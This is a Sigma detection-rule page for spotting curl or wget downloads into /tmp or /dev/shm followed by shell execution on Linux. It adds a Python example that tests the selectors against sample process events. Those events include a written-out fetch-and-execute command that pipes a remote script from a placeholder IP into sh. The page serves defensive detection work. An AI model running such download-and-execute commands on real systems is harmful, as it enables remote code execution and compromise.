Detection | high | experimental
Suspicious Download and Execute Pattern via Curl/Wget
Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
Log Source
Linux / Process Creation
Product: Linux (raw: linux)
Category: Process Creation (raw: process_creation)
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
Detection Logic
Detection Logic (3 selectors)
detection:
    selection_downloader:
        CommandLine|contains:
            - '/curl'
            - '/wget'
    selection_tmp:
        CommandLine|contains:
            - '/tmp/'
            - '/dev/shm/'
    selection_executor:
        CommandLine|contains: 'sh -c'
    condition: all of selection_*
False Positives
System update scripts using temporary files
Installer scripts or automated provisioning tools
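As an added example (not part of this rule page or the Sigma project), the three selectors and the `all of selection_*` condition above applied to constructed Linux process_creation events; event ids, hostnames and file names are made up.

```python
"""Reference evaluation of the rule's selectors over sample process events.
Added example, not the project's own code."""
from dataclasses import dataclass

# Selector values copied from the rule's YAML above.
DOWNLOADER = ("/curl", "/wget")
TMP_DIRS = ("/tmp/", "/dev/shm/")
EXECUTOR = ("sh -c",)


@dataclass
class ProcessEvent:
    event_id: str
    command_line: str


def _contains_any(haystack: str, needles: tuple) -> bool:
    # Sigma string matching is case-insensitive unless the |cased modifier is used.
    lowered = haystack.lower()
    return any(n.lower() in lowered for n in needles)


def matches_rule(command_line: str) -> bool:
    """condition: all of selection_* -> every selector must match the CommandLine."""
    return (_contains_any(command_line, DOWNLOADER)
            and _contains_any(command_line, TMP_DIRS)
            and _contains_any(command_line, EXECUTOR))


def evaluate(events):
    """Return the ids of events that trigger the rule, in input order."""
    return [e.event_id for e in events if matches_rule(e.command_line)]


# Constructed sample events; 203.0.113.0/24 and *.example are documentation placeholders.
SAMPLE_EVENTS = [
    # download into /dev/shm followed by execution: all three selectors match
    ProcessEvent("evt-1", '/bin/sh -c "/usr/bin/curl -fsSL http://203.0.113.10/s.sh -o /dev/shm/.s; sh /dev/shm/.s"'),
    # plain download to /tmp with no 'sh -c': selection_executor fails
    ProcessEvent("evt-2", "/usr/bin/wget -q https://mirror.example/pkg.tar.gz -O /tmp/pkg.tar.gz"),
    # tuning caveat: a bare 'curl' has no path separator, so '/curl' does not match
    ProcessEvent("evt-3", 'sh -c "curl -s http://203.0.113.10/s.sh -o /tmp/s.sh"'),
    # provisioning-style post-install script: matches and is the false positive the rule lists
    ProcessEvent("evt-4", '/bin/sh -c "/usr/bin/wget -qO /tmp/postinst.sh https://updates.example/postinst.sh && sh /tmp/postinst.sh"'),
]

if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS))  # ['evt-1', 'evt-4']
```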
MITRE ATT&CK
Tactics: Execution (attack.execution)
Techniques / Sub-techniques: T1059.004 (Command and Scripting Interpreter: Unix Shell), T1203 (Exploitation for Client Execution)
Rule Metadata
Rule ID
a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa
Status
experimental
Level
high
Type
Detection
Created
Tue Jun 17
Author
Path
rules/linux/process_creation/proc_creation_lnx_curl_wget_exec_tmp.yml
Raw Tags
attack.execution
attack.t1059.004
attack.t1203